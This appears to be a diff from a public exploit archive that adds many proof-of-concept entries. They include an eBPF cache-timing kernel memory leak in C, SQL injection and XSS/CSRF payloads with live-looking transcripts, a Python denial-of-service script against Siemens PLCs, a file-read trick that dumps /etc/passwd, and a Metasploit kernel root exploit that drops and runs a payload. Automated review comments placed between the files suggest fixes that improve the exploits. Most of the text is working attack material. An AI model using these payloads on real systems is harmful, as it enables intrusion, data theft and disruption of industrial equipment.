BPF_PROG_TYPE_SOCKET_FILTER, + .insn_cnt = insns_count, + .insns = (uint64_t)insns, + .license = (uint64_t)GPLv2, + .log_level = 1, + .log_size = sizeof(verifier_log), + .log_buf = (uint64_t)verifier_log + }; + int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs); + int errno_ = errno; + //printf("==========================\n%s==========================\n", +verifier_log); + errno = errno_; 
+ if (progfd == -1) + err(1, "prog load"); + return progfd; +} + +int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) { + int progfd = prog_load(insns, insns_count); + + // hook eBPF program up to a socket + // sendmsg() to the socket will trigger the filter + // returning 0 in the filter should toss the packet + int socks[2]; + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) + err(1, "socketpair"); + if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) + err(1, "setsockopt"); + return socks[1]; +} + +void trigger_proc(int sockfd) { + if (write(sockfd, "X", 1) != 1) + err(1, "write to proc socket failed"); +} + +int input_map, leak_map; +int sockfds[16]; + +int leak_bit(unsigned long addr, int bit) { + array_set_dw(input_map, 0, addr); + int count_0 = 0, count_1 = 0; + while (count_0 + count_1 < 100) { + array_time_flush_loc(leak_map, 0, 2048+0x1000); + trigger_proc(sockfds[bit+8]); + unsigned int t1 = array_time_flush_loc(leak_map, 0, 2048+0x1000); + + array_time_flush_loc(leak_map, 0, 2048); + trigger_proc(sockfds[bit+0]); + unsigned int t0 = array_time_flush_loc(leak_map, 0, 2048); + + //printf("%u %u\n", t0, t1); + if (t0 < 50) + count_0++; + if (t1 < 50) + count_1++; + } + printf("%d vs %d\n", count_0, count_1); + return (count_0 > count_1) ? 0 : 1; +} + +int leak_byte(unsigned long addr) { + int byte = 0; + for (int bit=0; bit<8; bit++) { + byte |= leak_bit(addr, bit)<= 8); + int selected_bit = i & 7; + struct bpf_insn insns[] = { + /* setup: write 0x00 or 0xff to -216 to get a big stack +allocation and to prepare dummy */ + BPF_ST_MEM(BPF_B, BPF_REG_FP, -216, dummy_ff ? 
0x00 : 0xff), + + /* setup: compute stack slot pointers to : + * - type-confused stack slot (at -72) + * - pointer to type-confused stack slot (at -144) + */ + BPF_MOV64_REG(BPF_REG_CONFUSED_SLOT, BPF_REG_FP), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_CONFUSED_SLOT, -72), + BPF_MOV64_REG(BPF_REG_SLOW_SLOT, BPF_REG_FP), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_SLOW_SLOT, -144), + //BPF_MOV64_REG(BPF_REG_0, BPF_REG_FP), + //BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -216), + + /* write to dummy slot (to make a big stack and to permit later read) */ + //BPF_ST_MEM(BPF_DW, BPF_REG_0, 0, 0), + + /* setup: store victim memory pointer in BPF_REG_CONFUSED_SLOT */ + BPF_LD_MAP_FD(BPF_REG_ARG1, input_map), + BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4), + BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0), + BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), + BPF_EXIT_INSN(), + BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0), + BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT, BPF_REG_0, 0), + + /* setup: spill pointer to type-confused stack slot */ + BPF_STX_MEM(BPF_DW, BPF_REG_SLOW_SLOT, BPF_REG_CONFUSED_SLOT, 0), + + /* setup: load pointer to leak area into register */ + BPF_LD_MAP_FD(BPF_REG_ARG1, leak_map), + BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4), + BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0), + BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), + BPF_EXIT_INSN(), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, 2048), /* leak_map+2048 */ + BPF_MOV64_REG(BPF_REG_LEAK_ARRAY, BPF_REG_0), + + /* CHEATED: fence and flush */ + BPF_MOV64_REG(BPF_REG_1, BPF_REG_SLOW_SLOT), + BPF_EMIT_CALL(4/*clflush_mfence*/), + + BPF_MOV64_REG(BPF_REG_DUMMY_SLOT, BPF_REG_FP), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_DUMMY_SLOT, -216), + + /* START CRITICAL PATH */ + BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS, +BPF_REG_SLOW_SLOT, 0), /* high-latency read of slot address */ + BPF_STX_MEM(BPF_DW, 
BPF_REG_CONFUSED_SLOT_ALIAS, +BPF_REG_DUMMY_SLOT, 0), /* bypassed store via high-latency address */ + BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED, BPF_REG_CONFUSED_SLOT, 0), + + BPF_LDX_MEM(BPF_B, BPF_REG_SECRET_VALUE, BPF_REG_CONFUSED, 0), + BPF_ALU64_IMM(BPF_AND, BPF_REG_SECRET_VALUE, 1<= 0) + printf(" %u\n", res); + } +*/ + + unsigned long base_addr = strtoull(argv[1], NULL, 16); + for (int i=0; i Proof Of Concept + +-------- > Request + +POST /php/login.php HTTP/1.1 +Cache-Control: no-cache +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, +like Gecko) Chrome/41.0.2272.16 Safari/537.36 +Accept: */* +Referer: http://IpAdress// +X-Requested-With: XMLHttpRequest +Accept-Language: en-us,en;q=0.5 +Host: IPAdress +Accept-Encoding: gzip, deflate +Content-Length: 304 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +login=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&password=3 + +-------- > Response + +HTTP/1.1 200 OK +Server: Apache +Content-Length: 261 +X-Frame-Options: SAMEORIGIN +Content-Type: text/html; charset=UTF-8 +Content-Encoding: +Date: Wed, 16 May 2018 10:49:31 GMT +Vary: Accept-Encoding + +
+Warning: mysqli::query(): (23000/1062): Duplicate entry +'_!@4dilemma:1' for key 'group_key' in +/share/HDA_DATA/Web/php/login.php on line 46
+
+Notice: Trying to get property of non-object in +/share/HDA_DATA/Web/php/login.php on line 47
+FALSE
+Fatal error: Call to a member function free() on boolean in +/share/HDA_DATA/Web/php/login.php on line 67
\ No newline at end of file diff --git a/exploits/java/webapps/44691.txt b/exploits/java/webapps/44691.txt new file mode 100644 index 000000000..8af6e9e84 --- /dev/null +++ b/exploits/java/webapps/44691.txt @@ -0,0 +1,17 @@ +# Exploit Title: ERPnext 11.x.x - Cross-Site Scripting +# Date: 2018-05-10 +# Exploit Author: Veerababu Penugonda +# Vendor Homepage: https://erpnext.com/ +# Software Link: https://demo.erpnext.com/ +# Version: Frappe ERPNext v11.x.x-develop +# Tested on: Mozilla Firefox quantum 60.1 , Ubuntu OS +# CVE : CVE-2018-11339 + +# 1. Description: +# https://demo.erpnext.com/desk#Form/Asset%20Repair/ARLOG-000015 +# and functionality “Comment” is vulnerable to XSS like Stored , +# Reflected , Cookie , possible for more + +# 2. Payload : + +"> \ No newline at end of file diff --git a/exploits/linux/dos/44693.py b/exploits/linux/dos/44693.py new file mode 100755 index 000000000..09f76d373 --- /dev/null +++ b/exploits/linux/dos/44693.py @@ -0,0 +1,18 @@ +# Exploit Title: Siemens SIMATIC S7-1500 CPU - Remote Denial of Service +# Google Dork: inurl:/Portal/Portal.mwsl +# Date: 2018-05-22 +# Exploit Author: t4rkd3vilz, Jameel Nabbo +# Vendor Homepage: https://www.siemens.com/ +# Version: SIMATIC S7-1500 CPU all versions before V1.6 +# Tested on: Kali Linux +# CVE: CVE-2014-5074 + + +#!/usr/bin/python + +import socket import sys from time import sleep if +len(sys.argv) != 2: print "Usage: exploit.py " sys.exit(0) for x in +range(1,50): s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) +#vulnerable TCP port 102 connect=s.connect((str(sys.argv[1]), 102)) +s.send('some evil string \r\n\n') print "bufff " + str(x) + " sent...\n" +result=s.recv(1024) print result s.close() sleep(7) \ No newline at end of file diff --git a/exploits/linux/local/44688.txt b/exploits/linux/local/44688.txt new file mode 100644 index 000000000..b049a6d41 --- /dev/null +++ b/exploits/linux/local/44688.txt 
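Review bot: In 44693.py the `#!/usr/bin/python` line follows the header comments instead of being line 1, so despite the 100755 mode the kernel will not honour it and the file only runs when an interpreter is named explicitly; move it to the first line. The `print` statements are Python 2 syntax, which the `# Tested on:` header does not state (`# Requires: Python 2` would save a reader the surprise), and the usage text `"Usage: exploit.py "` has lost its argument placeholder. The `#vulnerable TCP port 102` comment would be more useful if it also restated the header's remediation, that the issue is fixed from firmware V1.6 onward.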
@@ -0,0 +1,30 @@
+# Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
+# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
+# Date: 2018-05-21
+# Vendor Advisory: DSA-2018-095
+# Vendor KB: https://support.emc.com/kb/521234
+# Exploit Author: Paul Taylor
+# Github: https://github.com/bao7uo/dell-emc_recoverpoint
+# Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities
+# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
+# CVE: N/A
+
+# 1. Description
+# When logging in as boxmgmt and running an internal command, the ssh command may be used
+# to display the contents of files from the file system which are accessible to the boxmgmt user.
+
+# 2. Proof of Concept
+# Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
+# Select [3] Diagnostics
+# Select [5] Run Internal Command
+# ssh -F /etc/passwd 127.0.0.1
+
+test-cluster: 5
+This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool kps.pl netstat ping ping6 ssh telnet top uptime
+Enter internal command: ssh -F /etc/passwd 127.0.0.1
+/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
+/etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+/etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
+
+/etc/passwd: terminating, 34 bad configuration options
+Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280
\ No newline at end of file
diff --git a/exploits/linux/local/44696.rb b/exploits/linux/local/44696.rb
new file mode 100755
index 000000000..4ff526896
--- /dev/null
+++ b/exploits/linux/local/44696.rb
@@ -0,0 +1,200 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Post::Linux::Kernel + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AF_PACKET chocobo_root Privilege Escalation', + 'Description' => %q{ + This module exploits a race condition and use-after-free in the + packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in + the Linux kernel to execute code as root (CVE-2016-8655). + + The bug was initially introduced in 2011 and patched in 2016 in version + 4.4.0-53.74, potentially affecting a large number of kernels; however + this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels + 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as + Linux Mint. + + The target system must have unprivileged user namespaces enabled and + two or more CPU cores. + + Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation + may crash the kernel. + + This module has been tested successfully on Linux Mint 17.3 (x86_64); + Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel + versions 4.4.0-45-generic and 4.4.0-51-generic. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rebel', # Discovery and chocobo_root.c exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Aug 12 2016', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => + [ + [ 'AKA', 'chocobo_root.c' ], + [ 'EDB', '40871' ], + [ 'CVE', '2016-8655' ], + [ 'BID', '94692' ], + [ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ], + [ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ], + [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ], + [ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ], + [ 'URL', 'https://usn.ubuntu.com/3151-1/' ], + [ 'URL', 'https://www.securitytracker.com/id/1037403' ], + [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ] + ], + 'DefaultTarget' => 0)) + register_options [ + OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]), + OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), + ] + end + + def timeout + datastore['TIMEOUT'].to_i + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + end + + def upload_and_chmodx(path, data) + upload path, data + cmd_exec "chmod +x '#{path}'" + end + + def upload_and_compile(path, data) + upload "#{path}.c", data + + gcc_cmd = "gcc -o #{path} #{path}.c -lpthread" + if session.type.eql? 'shell' + gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" + end + output = cmd_exec gcc_cmd + rm_f "#{path}.c" + + unless output.blank? 
+ print_error output + fail_with Failure::Unknown, "#{path}.c failed to compile" + end + + cmd_exec "chmod +x #{path}" + end + + def exploit_data(file) + path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file + fd = ::File.open path, 'rb' + data = fd.read fd.stat.size + fd.close + data + end + + def live_compile? + return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') + + if has_gcc? + vprint_good 'gcc is installed' + return true + end + + unless datastore['COMPILE'].eql? 'Auto' + fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' + end + end + + def check + version = kernel_release + unless version =~ /^4\.4\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/ + vprint_error "Linux kernel version #{version} is not vulnerable" + return CheckCode::Safe + end + vprint_good "Linux kernel version #{version} is vulnerable" + + arch = kernel_hardware + unless arch.include? 'x86_64' + vprint_error "System architecture #{arch} is not supported" + return CheckCode::Safe + end + vprint_good "System architecture #{arch} is supported" + + cores = get_cpu_info[:cores].to_i + min_required_cores = 2 + unless cores >= min_required_cores + vprint_error "System has less than #{min_required_cores} CPU cores" + return CheckCode::Safe + end + vprint_good "System has #{cores} CPU cores" + + unless userns_enabled? + vprint_error 'Unprivileged user namespaces are not permitted' + return CheckCode::Safe + end + vprint_good 'Unprivileged user namespaces are permitted' + + CheckCode::Appears + end + + def exploit + if check != CheckCode::Appears + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + unless cmd_exec("test -w '#{base_dir}' && echo true").include? 
'true' + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + # Upload exploit executable + executable_name = ".#{rand_text_alphanumeric rand(5..10)}" + executable_path = "#{base_dir}/#{executable_name}" + if live_compile? + vprint_status 'Live compiling exploit on system...' + upload_and_compile executable_path, exploit_data('chocobo_root.c') + else + vprint_status 'Dropping pre-compiled exploit on system...' + upload_and_chmodx executable_path, exploit_data('chocobo_root') + end + + # Upload payload executable + payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" + upload_and_chmodx payload_path, generate_payload_exe + + # Launch exploit + print_status "Launching exploit (Timeout: #{timeout})..." + output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout + output.each_line { |line| vprint_status line.chomp } + print_status "Cleaning up #{payload_path} and #{executable_path}.." + rm_f executable_path + rm_f payload_path + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/44687.txt b/exploits/linux/webapps/44687.txt new file mode 100644 index 000000000..398101dd6 --- /dev/null +++ b/exploits/linux/webapps/44687.txt @@ -0,0 +1,12 @@ +# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting +# Google Dork: inurl:/Portal/Portal.mwsl +# Date: 2018-05-22 +# Exploit Author: t4rkd3vilz, Jameel Nabbo +# Vendor Homepage: https://www.siemens.com/ +# Version: SIMATIC S7-1200 CPU family Versions: V2.X and V3.X. +# Tested on: Kali Linux +# CVE: CVE-2014-2908 + +http://TargetIp/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue= +">&Send=Filter \ No newline at end of file diff --git a/exploits/linux/webapps/44698.txt b/exploits/linux/webapps/44698.txt new file mode 100644 index 000000000..1a86c1b98 --- /dev/null +++ b/exploits/linux/webapps/44698.txt 
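Review bot: `exploit_data` opens the file by hand and only closes it on the success path, so an exception from `fd.read` leaks the descriptor; the stdlib one-liner does the same job and always closes: `::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file)`. Path quoting is inconsistent between the two upload helpers: `upload_and_chmodx` runs `chmod +x '#{path}'` while `upload_and_compile` runs `chmod +x #{path}` and builds `gcc_cmd` unquoted, so a `WritableDir` containing spaces works on one path and not the other. In `upload_and_compile`, any non-blank gcc output triggers `fail_with`, which also fires on warnings from a successful compile; checking that the binary exists (e.g. `file_exist? path`) before failing would be more accurate.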
@@ -0,0 +1,39 @@ +# Exploit Title: NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection +# Dork: N/A +# Date: 2018-05-22 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 +# Version: 1.4 / fourth update +# Category: Webapps +# Tested on: Kali linux + +# PoC: SQLi: +# Parameter: id +# Type: boolean-based blind +# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5 +# Payload: + +Payload: id=5' AND 3563=3563 AND 'HmOW'='HmOW + +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: + +id=5' AND (SELECT 7446 FROM(SELECT +COUNT(*),CONCAT(0x7178707871,(SELECT +(ELT(7446=7446,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rNYc'='rNYc + +# Type: AND/OR time-based blind +# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5 +# Payload: + +id=5' AND SLEEP(5) AND 'KdYd'='KdYd + +# Type: UNION query +# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5 +# Payload: + +id=-1714' UNION ALL SELECT +NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- +WSZd&t=gallery \ No newline at end of file diff --git a/exploits/php/webapps/44685.txt b/exploits/php/webapps/44685.txt new file mode 100644 index 000000000..af30bd914 --- /dev/null +++ b/exploits/php/webapps/44685.txt 
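Review bot: exploits/php/webapps/44700.txt, added later in this commit, is the same advisory as this file apart from the `Target` capitalisation and a stray `iPayload:` typo, so one finding is being indexed under two ids; one of the two entries should be dropped or replaced with the content it was meant to carry. The UNION payload here ends in `&t=gallery`, which is the parameter of `download.php` (covered separately in 44702.txt) rather than of `home-text-edit.php`, so that line looks pasted from the other entry and should be checked against the actual endpoint.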
@@ -0,0 +1,87 @@ +# Exploit Title: Zechat 1.5 - 'hashtag' / 'v' SQL Injection / Cross site request forgery +# Date: 2018-05-22 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: https://bylancer.com +# Version: 1.5 +# Tested on: Kali linux +==================================================== +# POC 1 : SQLi : + +Parameter : hashtag + type : Union based + +http://test.com/chat/hashtag?hashtag=[SQL] + +# test : +http://test.com/chat/hashtag?hashtag=-1%27%20UNION%20SELECT%20NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20information_schema.columns%20where%20table_schema=schema()%23 + +# Payload : -1' UNION SELECT +NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL +from information_schema.columns where table_schema=schema()%23 + +==================================================== + +Parameter : v + type : time-based blind + +test.com/chat/me?action=edit&v=[SQL] + +# test : test.com/chat/me?action=edit&v=231 AND sleep(10)%23 + +# Payload : AND sleep(10)%23 + +==================================================== + +# POC 2 : CSRF : + +# CSRF vulnerability allows attacker to change user's information. +In this script we have anti-csrf which we can't change user's information +without token. +So we use 'hashtag' parameter to set our encoded payload and bypass csrf +protection : chat/hashtag?hashtag=[We have Reflected XSS here] + +# Exploit : + +
+ + + + + + + + + + + + +
+ + + +===================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44686.txt b/exploits/php/webapps/44686.txt new file mode 100644 index 000000000..f26f83813 --- /dev/null +++ b/exploits/php/webapps/44686.txt @@ -0,0 +1,10 @@ +# Exploit Title: WebSocket Live Chat - Cross-Site Scripting +# Date: 2018-05-22 +# Exploit Author: Alireza Norkazemi +# Vendor Homepage: https://codecanyon.net/item/websocket-live-chat-instant-messaging-php/16545798?s_rank=1 + +# POC : +1) Create your account and click setting icon and go to profile +2) Put this payload into Status box : + +3) The payload will be executed if someone opens your profile \ No newline at end of file diff --git a/exploits/php/webapps/44689.txt b/exploits/php/webapps/44689.txt new file mode 100644 index 000000000..29817a721 --- /dev/null +++ b/exploits/php/webapps/44689.txt @@ -0,0 +1,27 @@ +# Exploit Title: PaulPrinting CMS Printing 1.0 - SQL Injection +# Exploit Date: 2018-05-19 +# Software Link: https://codecanyon.net/item/paulprinting-cms-printing-solutions/19546365 +# Author: Mehmet Onder Key +# Version: 1.0 +# Tested On: Linux + +# 1. Description +# Any visitor can run code to exploit css and sql vulnerabilities in the +# products and order sections. + +# 2. Proof of Concept +# Example parameter with demo site : http://demo.codepaul.com/ +# printing/products/businesscard?pricelist=1&format=90x50&pages=2p4cf& +# paper=300g_ma&refinement=lamco + +# Time-Based Blind SQL Payload: +format=keyney+akkus') OR SLEEP(5)-- DLea + +# Boolean-Based Blind SQL Payload: +refinement=were') OR NOT 4134=4134# + +# Error-Based SQL Payload +paper=here') OR (SELECT 1712 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT +(ELT(1712=1712,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- oXDz +etc... (all parameter is effected -pricelist) \ No newline at end of file 
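Review bot: The CSRF section only works through a reflected XSS in the `hashtag` parameter (`[We have Reflected XSS here]`), yet neither the title nor the CSV description in this commit lists cross-site scripting as a finding; it should be recorded as its own issue, since it is what defeats the anti-CSRF token and is independently fixable. The `# Payload :` for the `v` parameter is given as a bare fragment (`AND sleep(10)%23`) while the `hashtag` payload is given in full, so the two sections would be clearer in the same form.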
diff --git a/exploits/php/webapps/44692.txt b/exploits/php/webapps/44692.txt new file mode 100644 index 000000000..8c4c2f000 --- /dev/null +++ b/exploits/php/webapps/44692.txt @@ -0,0 +1,51 @@ +# Exploit Title: iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery +# Date: 2018-05-22 +# Exploit Author: Borna nematzadeh (L0RD) +# Vendor Homepage: https://codecanyon.net/item/isocial-social-network-platform/21164041?s_rank=2 +# Version: 1.2.0 +# Tested on: Kali linux + +# POC 1 : Cross-Site scripting: + +1) Create your account and navigate to "write post". +2) Put this payload and click on "post" : + +3) You will have an alert box in your page . + +# POC 2 : Cross-Site Scripting: + +1) Navigate to "Albums" and click on "create album" +2) In title field , put this payload : +"/> +3) In both cases , the payload will be executed after someone opens your +album or your profile. + +# POC 3 : Cross-Site Request Forgery: +# iSocial - Social Network Platform 1.2.0 suffers from csrf vulnerability . +# Attacker can easily change user's email or delete user's account . + +# Change email Exploit : + + + + CSRF POC + + +
+ +
+ + + + +# Result : +# html "The information has been updated" +# status "OK" +# message "" + +# Delete account Exploit: + + \ No newline at end of file diff --git a/exploits/php/webapps/44699.txt b/exploits/php/webapps/44699.txt new file mode 100644 index 000000000..974a6b391 --- /dev/null +++ b/exploits/php/webapps/44699.txt @@ -0,0 +1,54 @@ +# Exploit Title: Auto car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting +# Date: 2018-05-22 +# Exploit Author: Borna nematzadeh (L0RD) +# Vendor Homepage: https://codecanyon.net/item/auto-car-car-listing-script/19221368?s_rank=1159 +# Version: 1.2 +# Tested on: Win 10 + +# POC 1: SQLi: + +# Parameter: car_title +# Type: Error based +# Payload: 1' and extractvalue(1,Concat(0x3a,user(),0x3a))# +# test: http://target/scripts/autocar_preview/ + +# Request: + +POST /scripts/autocar_preview/search-cars HTTP/1.1 +Host: kamleshyadav.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) +Gecko/20100101 Firefox/61.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://kamleshyadav.com/scripts/autocar_preview/ +Content-Type: application/x-www-form-urlencoded +Content-Length: 58 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 + +car_title=1' and extractvalue(1,Concat(0x3a,user(),0x3a))# + +# Response: + +HTTP/1.1 500 Internal Server Error +Server: nginx/1.12.2 +Date: Tue, 22 May 2018 14:36:47 GMT +Content-Type: text/html; charset=UTF-8 +Content-Length: 1371 +Connection: keep-alive + +

A Database Error Occurred

+

Error Number: 1105

XPATH syntax error: +':kamleshy_event@localhost:'

SELECT +* +FROM `autocar_car_details` +WHERE `car_status` = 1 AND `car_title` LIKE '%1' and +extractvalue(1,Concat(0x3a,user(),0x3a))#%'

+ +# POC 2: Cross site scripting: + +1) Create your account and navigate to "edit profile" +2) Put this payload in "name" and update your profile: + +3) You will have an alert box in your page . \ No newline at end of file diff --git a/exploits/php/webapps/44700.txt b/exploits/php/webapps/44700.txt new file mode 100644 index 000000000..f043ebbb2 --- /dev/null +++ b/exploits/php/webapps/44700.txt @@ -0,0 +1,39 @@ +# Exploit Title: NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection +# Dork: N/A +# Date: 2018-05-22 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 +# Version: 1.4 / fourth update +# Category: Webapps +# Tested on: Kali linux + +# PoC: SQLi: +# Parameter: id +# Type: boolean-based blind +# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5 +# Payload: + +iPayload: id=5' AND 3563=3563 AND 'HmOW'='HmOW + +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: + +id=5' AND (SELECT 7446 FROM(SELECT +COUNT(*),CONCAT(0x7178707871,(SELECT +(ELT(7446=7446,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rNYc'='rNYc + +# Type: AND/OR time-based blind +# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5 +# Payload: + +id=5' AND SLEEP(5) AND 'KdYd'='KdYd + +# Type: UNION query +# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5 +# Payload: + +id=-1714' UNION ALL SELECT +NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- +WSZd&t=gallery \ No newline at end of file diff --git a/exploits/php/webapps/44701.txt b/exploits/php/webapps/44701.txt new file mode 100644 index 000000000..418175669 --- /dev/null +++ b/exploits/php/webapps/44701.txt 
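Review bot: The request/response transcript in 44699.txt names a live third-party host (`Host: kamleshyadav.com`, `Referer: http://kamleshyadav.com/...`) and the error page discloses that site's database account `kamleshy_event@localhost`; the advisory already uses `http://target/` elsewhere, so the same placeholder should be applied to the transcript and the account name redacted before publication. The `Tested on: Win 10` header describes the client only, while the response shows `nginx/1.12.2`; stating the application version that produced this error would make the entry verifiable.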
